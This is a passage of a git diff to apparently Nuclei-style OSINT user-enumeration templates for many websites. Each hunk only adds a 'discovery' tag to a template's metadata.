osint,osint-social,hubski + tags: osint,osint-social,hubski,discovery self-contained: true diff --git a/http/osint/user-enumeration/hudsonrock.yaml b/http/osint/user-enumeration/hudsonrock.yaml index f8f9bd8fdcc..48ed5d86835 100644 --- a/http/osint/user-enumeration/hudsonrock.yaml +++ b/http/osint/user-enumeration/hudsonrock.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-security,hudsonrock + tags: osint,osint-security,hudsonrock,discovery self-contained: true diff --git a/http/osint/user-enumeration/hugging-face.yaml b/http/osint/user-enumeration/hugging-face.yaml index f25a2f9a158..adb8febc4a3 100644 --- a/http/osint/user-enumeration/hugging-face.yaml +++ b/http/osint/user-enumeration/hugging-face.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,hugging-face + tags: osint,osint-tech,hugging-face,discovery self-contained: true diff --git a/http/osint/user-enumeration/iconfinder.yaml b/http/osint/user-enumeration/iconfinder.yaml index 602304f9370..c4a1d3e23cd 100644 --- a/http/osint/user-enumeration/iconfinder.yaml +++ b/http/osint/user-enumeration/iconfinder.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,iconfinder + tags: osint,osint-images,iconfinder,discovery self-contained: true diff --git a/http/osint/user-enumeration/icq-chat.yaml b/http/osint/user-enumeration/icq-chat.yaml index 0720022412c..a49fca7d454 100644 --- a/http/osint/user-enumeration/icq-chat.yaml +++ b/http/osint/user-enumeration/icq-chat.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,icq-chat + tags: osint,osint-social,icq-chat,discovery self-contained: true diff --git a/http/osint/user-enumeration/ifttt.yaml b/http/osint/user-enumeration/ifttt.yaml index 5cdeeed4adc..37a1a4a940a 100644 --- a/http/osint/user-enumeration/ifttt.yaml +++ b/http/osint/user-enumeration/ifttt.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,ifttt + tags: osint,osint-misc,ifttt,discovery self-contained: true diff --git a/http/osint/user-enumeration/ifunny.yaml b/http/osint/user-enumeration/ifunny.yaml index 00f717654d4..9033b27b8b7 100644 --- a/http/osint/user-enumeration/ifunny.yaml +++ b/http/osint/user-enumeration/ifunny.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,ifunny + tags: osint,osint-misc,ifunny,discovery self-contained: true diff --git a/http/osint/user-enumeration/igromania.yaml b/http/osint/user-enumeration/igromania.yaml index b43961bcd2b..4d1dc29e5f6 100644 --- a/http/osint/user-enumeration/igromania.yaml +++ b/http/osint/user-enumeration/igromania.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,igromania + tags: osint,osint-social,igromania,discovery self-contained: true diff --git a/http/osint/user-enumeration/ilovegrowingmarijuana.yaml b/http/osint/user-enumeration/ilovegrowingmarijuana.yaml index fdea98f8596..db8669fe09c 100644 --- a/http/osint/user-enumeration/ilovegrowingmarijuana.yaml +++ b/http/osint/user-enumeration/ilovegrowingmarijuana.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,ilovegrowingmarijuana + tags: osint,osint-social,ilovegrowingmarijuana,discovery self-contained: true diff --git a/http/osint/user-enumeration/imagefap.yaml b/http/osint/user-enumeration/imagefap.yaml index 0779c0209b6..4169ebf1192 100644 --- a/http/osint/user-enumeration/imagefap.yaml +++ b/http/osint/user-enumeration/imagefap.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,imagefap + tags: osint,osint-porn,imagefap,discovery self-contained: true diff --git a/http/osint/user-enumeration/imageshack.yaml b/http/osint/user-enumeration/imageshack.yaml index 582add9c0f9..9f5e16acf27 100644 --- a/http/osint/user-enumeration/imageshack.yaml +++ b/http/osint/user-enumeration/imageshack.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,imageshack + tags: osint,osint-images,imageshack,discovery self-contained: true diff --git a/http/osint/user-enumeration/imgbb.yaml b/http/osint/user-enumeration/imgbb.yaml index eb9f2911439..52a3d02efc0 100644 --- a/http/osint/user-enumeration/imgbb.yaml +++ b/http/osint/user-enumeration/imgbb.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-image,imgbb + tags: osint,osint-image,imgbb,discovery self-contained: true diff --git a/http/osint/user-enumeration/imgsrcru.yaml b/http/osint/user-enumeration/imgsrcru.yaml index bf02ba836e2..9c4b27af30c 100644 --- a/http/osint/user-enumeration/imgsrcru.yaml +++ b/http/osint/user-enumeration/imgsrcru.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,imgsrcru + tags: osint,osint-images,imgsrcru,discovery self-contained: true diff --git a/http/osint/user-enumeration/imgur.yaml b/http/osint/user-enumeration/imgur.yaml index 3ac3d36ee2c..a85fe519c86 100644 --- a/http/osint/user-enumeration/imgur.yaml +++ b/http/osint/user-enumeration/imgur.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,imgur + tags: osint,osint-images,imgur,discovery self-contained: true diff --git a/http/osint/user-enumeration/inaturalist.yaml b/http/osint/user-enumeration/inaturalist.yaml index 14a3395de9c..628288393f3 100644 --- a/http/osint/user-enumeration/inaturalist.yaml +++ b/http/osint/user-enumeration/inaturalist.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,inaturalist + tags: osint,osint-hobby,inaturalist,discovery self-contained: true diff --git a/http/osint/user-enumeration/independent-academia.yaml b/http/osint/user-enumeration/independent-academia.yaml index 866d284f26b..90994d9c132 100644 --- a/http/osint/user-enumeration/independent-academia.yaml +++ b/http/osint/user-enumeration/independent-academia.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,independent-academia + tags: osint,osint-hobby,independent-academia,discovery self-contained: true diff --git a/http/osint/user-enumeration/inkbunny.yaml b/http/osint/user-enumeration/inkbunny.yaml index d0786e1916f..e15b489feea 100644 --- a/http/osint/user-enumeration/inkbunny.yaml +++ b/http/osint/user-enumeration/inkbunny.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,inkbunny + tags: osint,osint-porn,inkbunny,discovery self-contained: true diff --git a/http/osint/user-enumeration/insanejournal.yaml b/http/osint/user-enumeration/insanejournal.yaml index a4be53f33a0..0de0d9fe092 100644 --- a/http/osint/user-enumeration/insanejournal.yaml +++ b/http/osint/user-enumeration/insanejournal.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,insanejournal + tags: osint,osint-social,insanejournal,discovery self-contained: true diff --git a/http/osint/user-enumeration/instagram.yaml b/http/osint/user-enumeration/instagram.yaml index aff9f7dc78d..43d3869c5a8 100644 --- a/http/osint/user-enumeration/instagram.yaml +++ b/http/osint/user-enumeration/instagram.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,instagram + tags: osint,osint-social,instagram,discovery self-contained: true diff --git a/http/osint/user-enumeration/instructables.yaml b/http/osint/user-enumeration/instructables.yaml index 92196ebada2..4ff3375fd1e 100644 --- a/http/osint/user-enumeration/instructables.yaml +++ b/http/osint/user-enumeration/instructables.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,instructables + tags: osint,osint-hobby,instructables,discovery self-contained: true diff --git a/http/osint/user-enumeration/internet-archive-account.yaml b/http/osint/user-enumeration/internet-archive-account.yaml index 784be4014ce..747bbb868b6 100644 --- a/http/osint/user-enumeration/internet-archive-account.yaml +++ b/http/osint/user-enumeration/internet-archive-account.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,internet-archive-account + tags: osint,osint-misc,internet-archive-account,discovery self-contained: true diff --git a/http/osint/user-enumeration/internet-archive-user-search.yaml b/http/osint/user-enumeration/internet-archive-user-search.yaml index 7063bf043f1..2a782f2a090 100644 --- a/http/osint/user-enumeration/internet-archive-user-search.yaml +++ b/http/osint/user-enumeration/internet-archive-user-search.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,internet-archive-user-search + tags: osint,osint-misc,internet-archive-user-search,discovery self-contained: true diff --git a/http/osint/user-enumeration/interpals.yaml b/http/osint/user-enumeration/interpals.yaml index 581e0f6258f..56c85bc0ba0 100644 --- a/http/osint/user-enumeration/interpals.yaml +++ b/http/osint/user-enumeration/interpals.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-dating,interpals + tags: osint,osint-dating,interpals,discovery self-contained: true diff --git a/http/osint/user-enumeration/intigriti.yaml b/http/osint/user-enumeration/intigriti.yaml index 644828b5117..ff1ad2e7e46 100644 --- a/http/osint/user-enumeration/intigriti.yaml +++ b/http/osint/user-enumeration/intigriti.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,intigriti + tags: osint,osint-tech,intigriti,discovery self-contained: true diff --git a/http/osint/user-enumeration/ismygirl.yaml b/http/osint/user-enumeration/ismygirl.yaml index f3bc7b0ac44..f0f0c9c71cf 100644 --- a/http/osint/user-enumeration/ismygirl.yaml +++ b/http/osint/user-enumeration/ismygirl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,ismygirl + tags: osint,osint-finance,ismygirl,discovery self-contained: true diff --git a/http/osint/user-enumeration/issuu.yaml b/http/osint/user-enumeration/issuu.yaml index 06c92e63623..40bc5cd2614 100644 --- a/http/osint/user-enumeration/issuu.yaml +++ b/http/osint/user-enumeration/issuu.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,issuu + tags: osint,osint-shopping,issuu,discovery self-contained: true diff --git a/http/osint/user-enumeration/itchio.yaml b/http/osint/user-enumeration/itchio.yaml index f3fb4483253..24a4de8dbf9 100644 --- a/http/osint/user-enumeration/itchio.yaml +++ b/http/osint/user-enumeration/itchio.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,itchio + tags: osint,osint-gaming,itchio,discovery self-contained: true diff --git a/http/osint/user-enumeration/japandict.yaml b/http/osint/user-enumeration/japandict.yaml index d033b62c4a5..b38d012a189 100644 --- a/http/osint/user-enumeration/japandict.yaml +++ b/http/osint/user-enumeration/japandict.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,japandict + tags: osint,osint-social,japandict,discovery self-contained: true diff --git a/http/osint/user-enumeration/jbzd.yaml b/http/osint/user-enumeration/jbzd.yaml index 43aeefb0010..f0f1ecd45d5 100644 --- a/http/osint/user-enumeration/jbzd.yaml +++ b/http/osint/user-enumeration/jbzd.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,jbzd + tags: osint,osint-images,jbzd,discovery self-contained: true diff --git a/http/osint/user-enumeration/jejapl.yaml b/http/osint/user-enumeration/jejapl.yaml index c8ab2bb2335..c1129761180 100644 --- a/http/osint/user-enumeration/jejapl.yaml +++ b/http/osint/user-enumeration/jejapl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,jejapl + tags: osint,osint-misc,jejapl,discovery self-contained: true diff --git a/http/osint/user-enumeration/jeuxvideo.yaml b/http/osint/user-enumeration/jeuxvideo.yaml index de81de214b3..998e3f3b08d 100644 --- a/http/osint/user-enumeration/jeuxvideo.yaml +++ b/http/osint/user-enumeration/jeuxvideo.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,jeuxvideo + tags: osint,osint-gaming,jeuxvideo,discovery self-contained: true diff --git a/http/osint/user-enumeration/joe-monster.yaml b/http/osint/user-enumeration/joe-monster.yaml index d6976dd7ae5..9b6226d2e57 100644 --- a/http/osint/user-enumeration/joe-monster.yaml +++ b/http/osint/user-enumeration/joe-monster.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,joe-monster + tags: osint,osint-misc,joe-monster,discovery self-contained: true diff --git a/http/osint/user-enumeration/jsfiddle.yaml b/http/osint/user-enumeration/jsfiddle.yaml index e46746af6e4..e9f5b21ba4a 100644 --- a/http/osint/user-enumeration/jsfiddle.yaml +++ b/http/osint/user-enumeration/jsfiddle.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,jsfiddle + tags: osint,osint-coding,jsfiddle,discovery self-contained: true diff --git a/http/osint/user-enumeration/justforfans.yaml b/http/osint/user-enumeration/justforfans.yaml index 7adcdc61677..f2d89d55bfc 100644 --- a/http/osint/user-enumeration/justforfans.yaml +++ b/http/osint/user-enumeration/justforfans.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,justforfans + tags: osint,osint-porn,justforfans,discovery self-contained: true diff --git a/http/osint/user-enumeration/kaggle.yaml b/http/osint/user-enumeration/kaggle.yaml index e51370413e5..5fabc340bf0 100644 --- a/http/osint/user-enumeration/kaggle.yaml +++ b/http/osint/user-enumeration/kaggle.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,kaggle + tags: osint,osint-coding,kaggle,discovery self-contained: true diff --git a/http/osint/user-enumeration/karabin.yaml b/http/osint/user-enumeration/karabin.yaml index 084c8582ed7..4c61e718fa4 100644 --- a/http/osint/user-enumeration/karabin.yaml +++ b/http/osint/user-enumeration/karabin.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,karabin + tags: osint,osint-social,karabin,discovery self-contained: true diff --git a/http/osint/user-enumeration/kaskus.yaml b/http/osint/user-enumeration/kaskus.yaml index 1b3ceabf71b..c237aefd6f6 100644 --- a/http/osint/user-enumeration/kaskus.yaml +++ b/http/osint/user-enumeration/kaskus.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-social,kaskus + tags: osint,osint-social,kaskus,discovery self-contained: true diff --git a/http/osint/user-enumeration/keybase.yaml b/http/osint/user-enumeration/keybase.yaml index 51f67c1ba58..0640a8090b3 100644 --- a/http/osint/user-enumeration/keybase.yaml +++ b/http/osint/user-enumeration/keybase.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,keybase + tags: osint,osint-social,keybase,discovery self-contained: true diff --git a/http/osint/user-enumeration/kickstarter.yaml b/http/osint/user-enumeration/kickstarter.yaml index ed4cab6e4fe..ee6a9f8001d 100644 --- a/http/osint/user-enumeration/kickstarter.yaml +++ b/http/osint/user-enumeration/kickstarter.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,kickstarter + tags: osint,osint-shopping,kickstarter,discovery self-contained: true diff --git a/http/osint/user-enumeration/kik.yaml b/http/osint/user-enumeration/kik.yaml index a205c3e0389..bcf1d100797 100644 --- a/http/osint/user-enumeration/kik.yaml +++ b/http/osint/user-enumeration/kik.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,kik + tags: osint,osint-social,kik,discovery self-contained: true diff --git a/http/osint/user-enumeration/kipin.yaml b/http/osint/user-enumeration/kipin.yaml index 4c8c6c1f973..8d052fa6241 100644 --- a/http/osint/user-enumeration/kipin.yaml +++ b/http/osint/user-enumeration/kipin.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,kipin + tags: osint,osint-business,kipin,discovery self-contained: true diff --git a/http/osint/user-enumeration/knowyourmeme.yaml b/http/osint/user-enumeration/knowyourmeme.yaml index 40f13254e95..c9a77d5a6e0 100644 --- a/http/osint/user-enumeration/knowyourmeme.yaml +++ b/http/osint/user-enumeration/knowyourmeme.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,knowyourmeme + tags: osint,osint-social,knowyourmeme,discovery self-contained: true diff --git a/http/osint/user-enumeration/ko-fi.yaml b/http/osint/user-enumeration/ko-fi.yaml index c61d89d0866..d2850829c09 100644 --- a/http/osint/user-enumeration/ko-fi.yaml +++ b/http/osint/user-enumeration/ko-fi.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,ko-fi + tags: osint,osint-social,ko-fi,discovery self-contained: true diff --git a/http/osint/user-enumeration/kongregate.yaml b/http/osint/user-enumeration/kongregate.yaml index 5291104947e..0a1d45a69ec 100644 --- a/http/osint/user-enumeration/kongregate.yaml +++ b/http/osint/user-enumeration/kongregate.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,kongregate + tags: osint,osint-gaming,kongregate,discovery self-contained: true diff --git a/http/osint/user-enumeration/kotburger.yaml b/http/osint/user-enumeration/kotburger.yaml index 167d43418a6..f59597b6738 100644 --- a/http/osint/user-enumeration/kotburger.yaml +++ b/http/osint/user-enumeration/kotburger.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,kotburger + tags: osint,osint-images,kotburger,discovery self-contained: true diff --git a/http/osint/user-enumeration/kwejkpl.yaml b/http/osint/user-enumeration/kwejkpl.yaml index 878b37c5134..10cbd81ab68 100644 --- a/http/osint/user-enumeration/kwejkpl.yaml +++ b/http/osint/user-enumeration/kwejkpl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,kwejkpl + tags: osint,osint-images,kwejkpl,discovery self-contained: true diff --git a/http/osint/user-enumeration/lastfm.yaml b/http/osint/user-enumeration/lastfm.yaml index 73dd780ea5e..267164f4da0 100644 --- a/http/osint/user-enumeration/lastfm.yaml +++ b/http/osint/user-enumeration/lastfm.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-social,lastfm + tags: osint,osint-social,lastfm,discovery self-contained: true diff --git a/http/osint/user-enumeration/letterboxd.yaml b/http/osint/user-enumeration/letterboxd.yaml index f6fd3098526..ea76095f62c 100644 --- a/http/osint/user-enumeration/letterboxd.yaml +++ b/http/osint/user-enumeration/letterboxd.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-social,letterboxd + tags: osint,osint-social,letterboxd,discovery self-contained: true diff --git a/http/osint/user-enumeration/librarything.yaml b/http/osint/user-enumeration/librarything.yaml index d16d2a96eb7..c7ee2d09656 100644 --- a/http/osint/user-enumeration/librarything.yaml +++ b/http/osint/user-enumeration/librarything.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,librarything + tags: osint,osint-hobby,librarything,discovery self-contained: true diff --git a/http/osint/user-enumeration/libretoothgr-mastodon-instance.yaml b/http/osint/user-enumeration/libretoothgr-mastodon-instance.yaml index 2ceee60a4f6..b68c61594d8 100644 --- a/http/osint/user-enumeration/libretoothgr-mastodon-instance.yaml +++ b/http/osint/user-enumeration/libretoothgr-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,libretoothgr-mastodon-instance + tags: osint,osint-social,libretoothgr-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/lichess.yaml b/http/osint/user-enumeration/lichess.yaml index 662f27df03d..8480cb814c5 100644 --- a/http/osint/user-enumeration/lichess.yaml +++ b/http/osint/user-enumeration/lichess.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,lichess + tags: osint,osint-gaming,lichess,discovery self-contained: true diff --git a/http/osint/user-enumeration/likeevideo.yaml b/http/osint/user-enumeration/likeevideo.yaml index 82b350f4cb1..ba897d50bb9 100644 --- a/http/osint/user-enumeration/likeevideo.yaml +++ b/http/osint/user-enumeration/likeevideo.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,likeevideo + tags: osint,osint-social,likeevideo,discovery self-contained: true diff --git a/http/osint/user-enumeration/line.yaml b/http/osint/user-enumeration/line.yaml index 9b82b4bc65a..4759f26fce0 100644 --- a/http/osint/user-enumeration/line.yaml +++ b/http/osint/user-enumeration/line.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,line + tags: osint,osint-social,line,discovery self-contained: true diff --git a/http/osint/user-enumeration/linktree.yaml b/http/osint/user-enumeration/linktree.yaml index b7886e7b9d9..095067a1fce 100644 --- a/http/osint/user-enumeration/linktree.yaml +++ b/http/osint/user-enumeration/linktree.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,linktree + tags: osint,osint-social,linktree,discovery self-contained: true diff --git a/http/osint/user-enumeration/linuxorgru.yaml b/http/osint/user-enumeration/linuxorgru.yaml index 61c2dae3e8d..30017d58c59 100644 --- a/http/osint/user-enumeration/linuxorgru.yaml +++ b/http/osint/user-enumeration/linuxorgru.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,linuxorgru + tags: osint,osint-tech,linuxorgru,discovery self-contained: true diff --git a/http/osint/user-enumeration/litmindclub-mastodon-instance.yaml b/http/osint/user-enumeration/litmindclub-mastodon-instance.yaml index e5920173cab..0d7d8ec79bc 100644 --- a/http/osint/user-enumeration/litmindclub-mastodon-instance.yaml +++ b/http/osint/user-enumeration/litmindclub-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,litmindclub-mastodon-instance + tags: osint,osint-social,litmindclub-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/livejournal.yaml b/http/osint/user-enumeration/livejournal.yaml index 4f37c4afc13..015b0cbe060 100644 --- a/http/osint/user-enumeration/livejournal.yaml +++ b/http/osint/user-enumeration/livejournal.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-blog,livejournal + tags: osint,osint-blog,livejournal,discovery self-contained: true diff --git a/http/osint/user-enumeration/livemasterru.yaml b/http/osint/user-enumeration/livemasterru.yaml index 9336e3361d5..e82e07536a3 100644 --- a/http/osint/user-enumeration/livemasterru.yaml +++ b/http/osint/user-enumeration/livemasterru.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,livemasterru + tags: osint,osint-shopping,livemasterru,discovery self-contained: true diff --git a/http/osint/user-enumeration/lobsters.yaml b/http/osint/user-enumeration/lobsters.yaml index a65cf2812d9..90123f2565f 100644 --- a/http/osint/user-enumeration/lobsters.yaml +++ b/http/osint/user-enumeration/lobsters.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,lobsters + tags: osint,osint-tech,lobsters,discovery self-contained: true diff --git a/http/osint/user-enumeration/lorsh-mastodon-instance.yaml b/http/osint/user-enumeration/lorsh-mastodon-instance.yaml index 02687b82bd1..60f99334dab 100644 --- a/http/osint/user-enumeration/lorsh-mastodon-instance.yaml +++ b/http/osint/user-enumeration/lorsh-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,lorsh-mastodon-instance + tags: osint,osint-social,lorsh-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/love-ru.yaml b/http/osint/user-enumeration/love-ru.yaml index f4fc6802a42..2695c6fbe00 100644 --- a/http/osint/user-enumeration/love-ru.yaml +++ b/http/osint/user-enumeration/love-ru.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,love-ru + tags: osint,osint-social,love-ru,discovery self-contained: true diff --git a/http/osint/user-enumeration/lowcygierpl.yaml b/http/osint/user-enumeration/lowcygierpl.yaml index 0bffe5d147b..8a44984d735 100644 --- a/http/osint/user-enumeration/lowcygierpl.yaml +++ b/http/osint/user-enumeration/lowcygierpl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,lowcygierpl + tags: osint,osint-gaming,lowcygierpl,discovery self-contained: true diff --git a/http/osint/user-enumeration/luma.yaml b/http/osint/user-enumeration/luma.yaml index 2cb6855c956..d166b8c0535 100644 --- a/http/osint/user-enumeration/luma.yaml +++ b/http/osint/user-enumeration/luma.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-social,luma + tags: osint,osint-social,luma,discovery self-contained: true diff --git a/http/osint/user-enumeration/maga-chat.yaml b/http/osint/user-enumeration/maga-chat.yaml index 16f1e377dc7..fc6a1dca78c 100644 --- a/http/osint/user-enumeration/maga-chat.yaml +++ b/http/osint/user-enumeration/maga-chat.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,maga-chat + tags: osint,osint-social,maga-chat,discovery self-contained: true diff --git a/http/osint/user-enumeration/magabook.yaml b/http/osint/user-enumeration/magabook.yaml index daaa66c35b7..8477d9a9715 100644 --- a/http/osint/user-enumeration/magabook.yaml +++ b/http/osint/user-enumeration/magabook.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,magabook + tags: osint,osint-social,magabook,discovery self-contained: true diff --git a/http/osint/user-enumeration/magix.yaml b/http/osint/user-enumeration/magix.yaml index 687c1aa6934..27fdf80bd6b 100644 --- a/http/osint/user-enumeration/magix.yaml +++ b/http/osint/user-enumeration/magix.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-music,magix + tags: osint,osint-music,magix,discovery self-contained: true diff --git a/http/osint/user-enumeration/mail-archive.yaml b/http/osint/user-enumeration/mail-archive.yaml index 20ab3b8a25c..5e6931cdd14 100644 --- a/http/osint/user-enumeration/mail-archive.yaml +++ b/http/osint/user-enumeration/mail-archive.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,maillist + tags: osint,osint-coding,maillist,discovery self-contained: true http: diff --git a/http/osint/user-enumeration/manyvids.yaml b/http/osint/user-enumeration/manyvids.yaml index 387890d4fd8..2be2190268e 100644 --- a/http/osint/user-enumeration/manyvids.yaml +++ b/http/osint/user-enumeration/manyvids.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,manyvids + tags: osint,osint-porn,manyvids,discovery self-contained: true diff --git a/http/osint/user-enumeration/mapmytracks.yaml b/http/osint/user-enumeration/mapmytracks.yaml index 0de1b8a2bcc..a7b3e79b0db 100644 --- a/http/osint/user-enumeration/mapmytracks.yaml +++ b/http/osint/user-enumeration/mapmytracks.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-health,mapmytracks + tags: osint,osint-health,mapmytracks,discovery self-contained: true diff --git a/http/osint/user-enumeration/mapstodonspace-mastodon-instance.yaml b/http/osint/user-enumeration/mapstodonspace-mastodon-instance.yaml index 301e0d4baf7..b4f904a8c09 100644 --- a/http/osint/user-enumeration/mapstodonspace-mastodon-instance.yaml +++ b/http/osint/user-enumeration/mapstodonspace-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mapstodonspace-mastodon-instance + tags: osint,osint-social,mapstodonspace-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/maroc-nl.yaml b/http/osint/user-enumeration/maroc-nl.yaml index 2f3aba76b5a..ffa3aab592e 100644 --- a/http/osint/user-enumeration/maroc-nl.yaml +++ b/http/osint/user-enumeration/maroc-nl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,maroc-nl + tags: osint,osint-social,maroc-nl,discovery self-contained: true diff --git a/http/osint/user-enumeration/marshmallow.yaml b/http/osint/user-enumeration/marshmallow.yaml index 5323deac55c..431c0e8bfc6 100644 --- a/http/osint/user-enumeration/marshmallow.yaml +++ b/http/osint/user-enumeration/marshmallow.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,marshmallow + tags: osint,osint-social,marshmallow,discovery self-contained: true diff --git a/http/osint/user-enumeration/martech.yaml b/http/osint/user-enumeration/martech.yaml index a696e31a8c3..33b822dd098 100644 --- a/http/osint/user-enumeration/martech.yaml +++ b/http/osint/user-enumeration/martech.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,martech + tags: 